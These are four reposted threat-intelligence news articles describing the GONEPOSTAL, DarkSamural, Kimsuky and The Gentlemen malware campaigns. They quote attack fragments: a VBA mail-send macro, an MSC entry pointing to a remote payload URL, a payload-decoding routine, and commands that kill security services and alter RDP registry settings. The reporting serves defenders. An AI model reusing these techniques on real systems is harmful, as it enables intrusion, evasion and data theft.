In recent weeks, security teams have observed a sophisticated new strain of malware—dubbed GONEPOSTAL—that subverts Microsoft Outlook to relay command and control (C2) instructions.

Emerging through spear-phishing campaigns targeting corporate environments, GONEPOSTAL disguises itself as a benign Office document.

Upon opening the weaponized attachment, victims unknowingly activate a multi-stage payload that interfaces directly with Outlook’s COM APIs to send and receive encrypted email messages containing C2 data.

Early indicators suggest the threat actor behind GONEPOSTAL aims to maintain stealth by hiding network traffic within legitimate email flows, undermining traditional perimeter-based defenses.

Kroll analysts noted that the initial compromise vectors rely on social engineering tactics that exploit common workplace behaviors.

The malicious document leverages a heavily obfuscated VBA macro to drop a lightweight launcher executable into the user’s temporary folder.

Once invoked, the launcher dynamically loads additional modules from a remote server, blending in with routine Outlook operations.

These secondary modules parse the victim’s address book to identify likely internal targets for lateral movement, then craft outbound emails with base64-encoded control instructions embedded in image attachments.

Kroll researchers identified that this tactic effectively bypasses most email gateway appliances, as the attachments appear as innocuous company logos or promotional flyers.

In its third phase, GONEPOSTAL establishes persistence by creating a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, referencing a benign-looking Word document named “Company_Update.docx.”

This document contains a hidden OLE object that, when opened by the victim via Outlook preview, re-executes the payload without raising any security prompts.

Further, the malware writes a DLL into the AppData\Roaming\Microsoft\Outlook directory and registers it with Outlook’s add-ins framework, ensuring that every instance of Outlook automatically loads the malicious component on startup.

Victims typically remain unaware of the residence of the threat, as the add-in manifests under the name “OfficeUpdate.”

The impact of GONEPOSTAL has been significant. Multiple mid-sized enterprises in North America have reported unexplained outbound email traffic spikes, matched by credential theft and unauthorized file transfers.

Security teams investigating anomalous SMTP sessions uncovered encrypted JSON blobs masquerading as inline images, which—after decryption—revealed system reconnaissance data and remote shell commands.

This dynamic C2 channel enables the adversaries to query registry keys, manipulate files, and pivot to domain controllers, all while evading standard detection signatures.

Infection Mechanism

A closer examination of GONEPOSTAL’s infection mechanism reveals the campaign’s reliance on a cleverly crafted VBA macro embedded within a booby-trapped document.

The macro code, heavily obfuscated to conceal its true purpose, begins by declaring Outlook COM object references:-

Dim OutlookApp As Object
Set OutlookApp = CreateObject("Outlook.Application")
Dim MailItem As Object
Set MailItem = OutlookApp.CreateItem(0)
MailItem.To = recipientAddress
MailItem.Subject = "Monthly Report"
MailItem.Attachments.Add payloadPath
MailItem.Send

Once executed, this snippet not only dispatches the initial payload but also schedules follow-up tasks via the Windows Task Scheduler, ensuring that Outlook remains the primary conduit for ongoing command orchestration.

By leveraging native Windows and Office components, GONEPOSTAL sidesteps external dependencies, making it especially challenging to pinpoint through conventional network monitoring tools.

The infection chain culminates with the installation of a stealthy Outlook add-in, allowing the attacker to harvest sent and received emails, covertly modify message content, and issue new C2 commands without user awareness.

This modular design demonstrates a high degree of operational maturity, indicating that the threat actor is well-versed in blending malicious activity into everyday user workflows.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New GONEPOSTAL Malware Hijacking Outlook to Enable Command and Control Communication appeared first on Cyber Security News.

Security researchers have observed a sophisticated campaign in recent weeks targeting critical infrastructure and government entities across South Asia.

Dubbed the DarkSamural operation, this attack chain leverages deceptively crafted LNK and PDF files to infiltrate networks, establish persistence, and exfiltrate sensitive information.

Initial reconnaissance indicates that the adversaries disguise malicious MSC (Microsoft Management Console) files with familiar PDF icons, enticing recipients to inadvertently launch embedded scripts.

As the campaign unfolds, stolen credentials and system metadata flow back to the attackers’ command-and-control servers, enabling further lateral movement.

The infection begins with a spear-phishing email containing a compressed archive. Recipients are presented with a file named Drone_Information.pdf[.]msc, which, despite its PDF-like appearance, executes when double-clicked.

Ctfiot analysts noted that these MSC files employ GrimResource technology to unpack and run obfuscated JavaScript, which in turn downloads a second-stage payload.

This multi-layered approach impedes signature-based detection, as each stage appears benign until deobfuscation occurs.

Researchers identified that the malicious script contacts a remote URL and retrieves a disguised DLL, eventually stored under C:\ProgramData\DismCore[.]dll for subsequent execution.

By the third paragraph, it becomes evident that DarkSamural’s impact extends beyond initial access.

Victims have reported unauthorized file transfers, browser credential theft, and even remote shell access.

The combination of open-source and proprietary RATs—including Mythic, QuasarRat, and BADNEWS—grants the attackers versatile control over compromised machines.

Files harvested range from administrative documents to proprietary research, underscoring the campaign’s strategic focus on exfiltrating high-value targets.

Further analysis reveals that the malicious DLL embeds an export function, DIIRegisterServer, which dynamically resolves critical Windows APIs.

Upon execution, the sample gathers host details such as machine name, user account, and process ID, packaging them into a JSON check-in packet.

This packet is encrypted with AES-128-GCM and transmitted to the C2 endpoint over WinHTTP. The resulting network artifacts mimic legitimate update traffic, complicating anomaly detection.

Infection Mechanism and Obfuscation

A closer examination of the MSC file’s internal structure uncovers a multi-layered obfuscation scheme designed to thwart reverse engineering.

The initial JavaScript code, embedded in an XML StringTable, triggers an XSL transformation that launches mmc[.]exe with a remote script reference.

<StringTable>
  <GUID> {71E5B33E-1064-11D2-808F-0000F875A9CE} </GUID>
  <Strings>
    <String ID="14"> https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html </String>
  </Strings>
</StringTable>

After fetching the second layer, the script reverses character sequences, substitutes tokens, converts to hexadecimal, and performs Base64 decoding to produce the final DLL.

The decoding routine exemplifies this transformation in Python:-

def decode (str):
    b = list (str)
    c = ''[.]join (b[::-1]) [.]replace("$", "4") [.]replace ("!", "1")
    d = ''[.]join ([chr (int (c [i:i+2], 16)) for i in range (0, len (c), 2)])
    return base64[.]b64decode (d)

Subsequently, the decoded bytes are written to disk and registered as a COM server, ensuring execution on system startup.

This layered obfuscation, combined with scheduled task creation, illustrates DarkSamural’s meticulous approach to infection and evasion.

Cybersecurity teams should inspect MSC file behavior, monitor anomalous mmc[.]exe invocations, and validate script-based downloads against known artifact hashes to detect and disrupt this campaign.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post DarkSamural APT Group Malicious LNK and PDF Files to Steal Critical Data appeared first on Cyber Security News.

The North Korea-backed APT group Kimsuky has escalated its cyber operations by weaponizing GitHub repositories for malware delivery and data exfiltration, marking a sophisticated evolution in their attack methodology.

This latest campaign demonstrates the group’s growing expertise in abusing legitimate cloud infrastructure to evade traditional security measures while maintaining persistent access to compromised systems.

The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk).

When executed, this weaponized shortcut launches a PowerShell command that downloads and executes additional malicious scripts from attacker-controlled GitHub repositories.

The initial payload establishes a foundation for systematic data collection and maintains long-term persistence on infected systems.

S2W researchers identified nine private GitHub repositories associated with this campaign, including group_0717, group_0721, test, hometax, and group_0803.

The threat actors embedded hardcoded GitHub Private Tokens directly within their PowerShell scripts to access these repositories, demonstrating careful operational security planning.

Analysis of commit histories revealed the attacker’s email address (sahiwalsuzuki4[@]gmail.com) used during GitHub account creation.

The malware’s persistence mechanism represents a particularly sophisticated approach to maintaining long-term access.

Upon initial infection, the main.ps1 script creates a file named MicrosoftEdgeUpdate.ps1 under the %AppData% directory and establishes a scheduled task with the name “BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}”.

This task executes every 30 minutes after an initial 5-minute delay, creating an automated system for fetching and executing updated PowerShell scripts from the GitHub repository.

Dynamic Script Management and Information Gathering

The malware employs a dynamic script management system that timestamps infected systems and creates customized folders for data exfiltration.

The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_{MMdd_HHmm}), and re-uploads the modified script using a time-specific filename format.

This mechanism allows attackers to track individual infections and manage multiple compromised systems simultaneously.

The information-stealing component collects comprehensive system metadata including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes.

All collected data is compiled into log files and uploaded to the attacker’s repository under timestamped folders, creating an organized intelligence database for the threat actors.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Kimsuky Hackers Via Weaponized LNK File Abuses GitHub for Malware Delivery appeared first on Cyber Security News.

In recent months, security researchers have observed a surge in activity by a previously undocumented ransomware group known as The Gentlemen.

This threat actor has rapidly distinguished itself through the deployment of highly specialized tools and meticulous reconnaissance tactics, targeting critical infrastructure across multiple sectors and regions.

Leveraging legitimate Windows drivers and nuanced Group Policy Object (GPO) manipulation, The Gentlemen are capable of evading traditional defenses and achieving domain-wide compromise.

The initial intrusion techniques of this group remain partially obscured; however, forensic evidence suggests that compromised credentials or exposed internet-facing services served as the primary infection vectors.

Following foothold establishment, The Gentlemen deploy a dual-component defense evasion suite consisting of All.exe and ThrottleBlood.sys—a legitimate signed driver abused to terminate protected security processes.

This kernel-level manipulation enables the threat actors to neutralize endpoint protections without triggering standard alerts.

Trend Micro analysts noted that subsequent iterations of this suite include a dynamically modified binary, Allpatch2.exe, which specifically targets the unique security agent components present in the compromised network.

By adapting their tools mid-campaign, the group has demonstrated both flexibility and a deep understanding of the enterprise security landscape.

This approach has facilitated widespread deployment of their encryption payload via the NETLOGON share, ensuring rapid and comprehensive file encryption across domain-joined systems.

The impact of The Gentlemen’s operations has been severe: key sectors such as manufacturing, healthcare, and construction have suffered service disruptions and extensive data encryption.

Victims have reported loss of critical backups and unauthorized exfiltration of sensitive information via WinSCP, confirming the adoption of a double-extortion strategy.

This depicts the ransomware attack chain, illustrating each stage from initial access through data exfiltration.

Infection Mechanism and Kernel-Level Evasion

A defining characteristic of The Gentlemen’s methodology is its exploitation of a legitimate Windows driver to achieve kernel-level execution.

Upon execution, the ransomware drops a pair of files into the %USERPROFILE%\Downloads directory:-

copy All.exe %USERPROFILE%\Downloads\All.exe
copy ThrottleBlood.sys %USERPROFILE%\Downloads\ThrottleBlood.sys

The attacker then invokes the driver to terminate targeted security services: the command-line sequence illustrates this abuse of signed driver functionality:-

%USERPROFILE%\Downloads\All.exe install ThrottleBlood.sys
taskkill /IM avagent.exe /F
taskkill /IM VeeamNFSSvc.exe /F

By leveraging this technique, The Gentlemen escape the limitations of user-mode bypasses.

Once kernel execution is secured, the ransomware escalates privileges using PowerRun.exe, a legitimate utility frequently abused for elevated command execution.

This allows the malware to modify critical registry keys—such as enabling RDP access via reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v SecurityLayer /t REG_DWORD /d 1 /f—and deploy persistence mechanisms through GPO objects.

While this attack chain shows the code-driven stages of driver-based process termination. The combination of legitimate tools with custom binaries exemplifies a mature adversary who balances stealth, adaptability, and impact.

As organizations struggle with conventional endpoint defenses, the emergence of such advanced tactics underscores the urgent need for proactive threat hunting and implementation of Zero Trust principles.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post New Gentlemen Ransomware Leverages Legitimate Drivers, Group Policies to Infiltrate Organizations appeared first on Cyber Security News.